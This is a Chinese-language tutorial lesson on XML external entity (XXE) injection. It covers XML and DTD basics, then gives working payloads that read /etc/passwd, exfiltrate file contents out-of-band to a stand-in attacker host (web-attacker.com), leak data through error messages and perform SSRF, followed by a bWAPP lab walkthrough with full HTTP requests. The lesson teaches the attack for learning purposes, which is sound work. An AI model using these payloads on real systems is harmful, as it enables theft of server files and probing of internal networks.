You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

310 lines
13 KiB
Markdown

2 years ago
# 24资源注入攻击方式为什么会升级
你好,我是王昊天。
在我们浏览Web应用的时候我们可以看到很多不同的信息并且它们会以不同的样式展现给我们。Web开发者为了方便数据的管理和维护往往会将数据内容和前端设计分开。XML会在这个过程中扮演很重要的角色。
XML即可扩展标记语言它的名称来自eXtensible Markup Language的缩写。XML与HTML不同它仅仅被设计用来传输和存储数据不负责数据的显示。值得一提的是它被广泛应用于各种Web应用中为数据的读取提供了极大的便利。
可是XML在给我们带来便利的同时也带来了一些安全性的问题今天让我们一起来学习它带来的安全问题吧
## XML外部实体注入
XML带来的安全问题主要是XML外部实体注入即XML external entity (XXE) injection我们简称为XXE。在对这一漏洞进行学习之前我们首先来学习XML的基础知识。
### XML可扩展标记语言
XML的意思为可扩展标记语言它是负责数据的传输和存储的。为了让你更好地理解它我们直接来看示例。
```xml
# 这是XML声明。
<?xml version="1.0" encoding="ISO-8859-1"?>
# 接下来开始了对存储数据的描述,它的根元素为`note`。
<note date="2022/02/08">
<to>LiYang</to>
<from>WangHua</from>
<heading>Email</heading>
<body>Welcome to China!</body>
</note>
```
这就是一个简单的XML语句你可能看不懂它但不要着急我来给你解释一下。
代码第一行的内容为XML语言的声明它定义了XML版本1.0以及所使用的编码ISO-8859-1。完成声明之后就可以开始存储数据了可以看到它包含了很多的标签其中note标签是它的根节点在根节点下面有很多标签如<to><from>这些标签的名字可由我们自由设定标签中夹的内容为标签对应的数据这可以方便Web应用去获取。
其中note标签中包含了一个date属性标签中的属性主要用来记录数据的元数据例如数据的编号等。数据本身则应该存储为元素所以我们最好将上述XML代码改为如下
```xml
# 这是XML声明。
<?xml version="1.0" encoding="ISO-8859-1"?>
# 接下来开始了对存储数据的描述,它的根元素为`note`。
<note id="1">
<date>2022/02/08</date>
<to>LiYang</to>
<from>WangHua</from>
<heading>Email</heading>
<body>Welcome to China!</body>
</note>
```
**这样XML代码就更加符合规范。**当然XML代码也是存在一定的形式要求的那就是XML验证我们先来看看对于XML的形式要求是什么。
第一个要求为XML文档必须要有根元素在上述代码示例中note即为根元素。符合这一个要求后验证程序会去检验XML文档中必须有关闭标签即有了<date>就必须要有</date>并且标签中的字母大小写要一致。最后验证程序会去判断XML是否被正确嵌套了并且它标签中的属性值是否加了引号。
当一个XML文档符合上述形式要求后它还需要满足一个文档类型定义即DTD的语法规则接下来让我们一起来学习它。
### DTD文档类型定义
DTD的作用为定义XML文档的合法构建方式为了让你更好地理解它下面让我们一起来看一个示例
```xml
<!DOCTYPE note [
<!ELEMENT note (date,to,from,heading,body)>
<!ELEMENT date (#PCDATA)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
```
在上述DTD代码中第一行定义了这是对哪种类型的根元素的限制如在上述示例中就是对note类型的限制。然后规定了这个节点下面有哪些子标签并且对每个标签的内容进行定义示例中将每个标签的内容都规定为PCDATA即解析字符数据。
完成了DTD的编写之后Web应用在处理XML文档时就会开始判断XML是否合法如果合法就会处理这个文档否则就不会继续处理这个文档。一般来说DTD文档既可以被写在XML文档内也可以通过外部引用进行导入它的导入方式如下
```xml
<!DOCTYPE note SYSTEM "http://www.example.com/example.dtd">
#其中 example.dtd文件为
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
```
这段代码引入了外部DTD文件这里是一个安全隐患。到这里你可能会好奇DTD不就是做一些检测工作会导致什么安全问题呢
事实上这个DTD文档还有一个实体声明的功能**它的这一功能也就是导致我们今天所讲的XXE漏洞的主要原因。**接下来,让我们一起来重点看看它吧。
DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量这么说可能会有点抽象下面我们一起看一个示例这样理解起来就会简单些。
```xml
<?xml version="1.0"?>
<!DOCTYPE example [
#<!ENTITY 实体名称 “实体的值”>
<!ENTITY to "LiHua">
]>
<example>&to;</example>
```
在这个示例的DTD语句中定义了一个实体to并让它的值为LiHua然后在XML语句中可以用&to调用这个实体。
这是一个内部实体声明因为实体的值已经被写在了XML语句中它其实还支持外部实体声明具体的实现方式为
```plain
#<!ENTITY 实体名称 SYSTEM "URI">
<!ENTITY to SYSTEM "http://example.com/example.dtd">
```
这个功能就是我们今天所讲的XXE的罪魁祸首攻击者就是通过DTD外部实体声明来实现外部实体注入的。
### XML外部实体注入的产生原因
如果Web应用存在外部实体注入问题那么攻击者可以构建负载如下
```plain
<!DOCTYPE a [
<!ENTITY b SYSTEM "file:///etc/passwd">
]>
<c>&b;</c>
```
如果页面解析了其中c标签的内容并将它输出在Web页面上那么攻击者就可以读取到隐私文件passwd里的内容这是非常危险的。
当然攻击者也可以利用DTD文档引入外部DTD文档然后再引入外部实体声明这样需要的XML内容为
```plain
<?xml version="1.0"?>
<!DOCTYPE a SYSTEM "http://evial_ip.com/evil.dtd">
<c>&b;</c>
```
其中外部的evil.dtd文件的内容为
```plain
<!ENTITY b SYSTEM "file:///etc/passwd">
```
这样也是可以实现输出隐私文件passwd的功能。除此之外攻击者还可以通过DTD外部实体声明引入外部实体声明这有点类似于套娃了不过它也是一种可行的方式让我们一起来看看吧。
```plain
<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY % d SYSTEM "http://example.com/example.dtd">
%d;
]>
<c>&b;</c>
#example.dtd的内容为
<!ENTITY b SYSTEM "file:///etc/passwd">
```
注意这里的%d它是一个参数实体。Web应用在解析这个XML文件时会首先将%d的值设置为example.dtd中的内容然后调用%d将example.dtd的运行结果赋予给b并将它输出到标签<c>中。
以上内容就是XML外部实体注入的产生原因下面我们一起来学习它有哪些危害吧。
## XML外部实体注入的危害
XML外部实体注入会有很多危害例如隐私文件获取以及发起SSRF攻击。让我们看一下它的攻击方式。
### XXE隐私文件获取
在之前学习XXE攻击方式的过程中我们用XXE攻击来获取passwd文件。其实这就是XXE获取隐私文件的攻击方式。
在之前的示例中我们默认了页面会将我们设置的XML内容进行输出但实际上**Web应用往往不会输出我们注入的XML内容**。这时候就是XXE盲注我们需要借助一些技巧来将文件的内容展示出来。
面对XXE盲注时我们可以利用带外的方法来获取数据
```plain
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
```
在上述示例中我们将获取到的数据通过get方式发送到攻击者的服务器这样攻击者可以查看服务器接收到的请求获取到想要的数据。
当然,我们还可以利用报错信息来输出想要获取的数据:
```plain
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
```
在这个示例中我们将引入了error参数XML会去访问一个不存在的文件导致错误的产生并将错误信息给eval由于文件路径中存在我们需要的数据file这样就会导致Web应用显示出错信息并且其中包含我们需要的数据。我们可以看一个示例输出
```plain
java.io.FileNotFoundException: /nonexistent/root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
```
### XXE发起SSRF攻击
SSRF攻击即为服务端请求伪造我们可以利用XXE来实现。首先我们先来看一个示例这样可以帮助我们理解它的攻击方式。
```plain
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>
```
这是我们需要注入的XML代码Web应用在解析它的时候会向其中的链接发出请求并且这个请求是由被攻击Web应用的服务器所发送的这就是SSRF攻击。
它到底有什么作用呢?**我们可以利用它来判断Web应用服务器内网地址的开启情况**,只需要将链接改为服务器的内网地址,然后根据响应的内容就可以判断内网地址是否开放,这会对内网的安全产生威胁。
在了解完XXE的攻击方式后让我们进入到实战部分来切身体会下XXE攻击的危害吧。
## 实战演练
在实战过程中我们选用靶场bwapp做测试需要注意的是我们要将bwapp靶场中的xxe-2.php文件中的内容作修改将$xml的值改为如下
```php
$xml = simplexml_load_string($body,'SimpleXMLElement',LIBXML_NOENT);
```
然后,打开靶场我们可以看到,页面中有一个按钮 `Any bugs?`我们点击不会有反应这时候可以打开Burpsuite做测试通过捕获我们获取到点击按钮会发送请求
```plain
POST /xxe-2.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 59
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
sec-ch-ua-platform: "macOS"
Content-type: text/xml; charset=UTF-8
Accept: */*
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/xxe-1.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: security_level=0; PHPSESSID=847jvmklugetdus5u1on5b92v6
Connection: close
<reset><login>bee</login><secret>Any bugs?</secret></reset>
```
经过观察我们看到Content-type的值为text/xml所以我们可以分析出下面的数据为XML数据于是可以尝试进行XXE攻击。
```plain
POST /xxe-2.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 178
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
sec-ch-ua-platform: "macOS"
Content-type: text/xml; charset=UTF-8
Accept: */*
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/xxe-1.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: security_level=0; PHPSESSID=847jvmklugetdus5u1on5b92v6
Connection: close
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE reset[
<!ENTITY Info SYSTEM "http://127.0.0.1/1.txt">
]>
<reset><login>&Info;</login><secret>Any bugs?</secret></reset>
```
我们可以利用之前学习的知识将请求中的XML数据进行修改利用XXE攻击获取到1.txt文件中的内容。
![图片](https://static001.geekbang.org/resource/image/39/77/395a33bf52ec0bafeec39e73a24c5177.jpg?wh=1920x1019)
可以看到1.txt中的内容已经被显示在响应中我们的XXE攻击成功。
## 总结
这一讲我们学习了XML外部实体注入攻击首先我们介绍了什么是XML可扩展标记语言知道它是一个用来存储和调用数据的文件并对它的语法进行了大致的了解。
随着对它学习的深入我们知道了XML中存在一个验证文档即DTD文档类型定义并了解到它其中有一个实体定义的问题也就是引起XXE漏洞的主要原因。
在学习完一些XML以及DTD的基础知识后我们深入地分析了XXE漏洞产生的原因即XML代码注入导致的DTD对外部实体的定义从而获取到一些隐私文件或者发起服务端请求伪造。
最后我们通过实战切身体会到了XXE攻击的危害并且加深了我们对这一攻击方式的理解。
## 思考题
你知道有什么防范XXE攻击的措施吗
欢迎在评论区留下你的思考。如果觉得今天的内容对你有所帮助的话,也欢迎你把课程分享给其他同事或朋友,我们共同学习进步!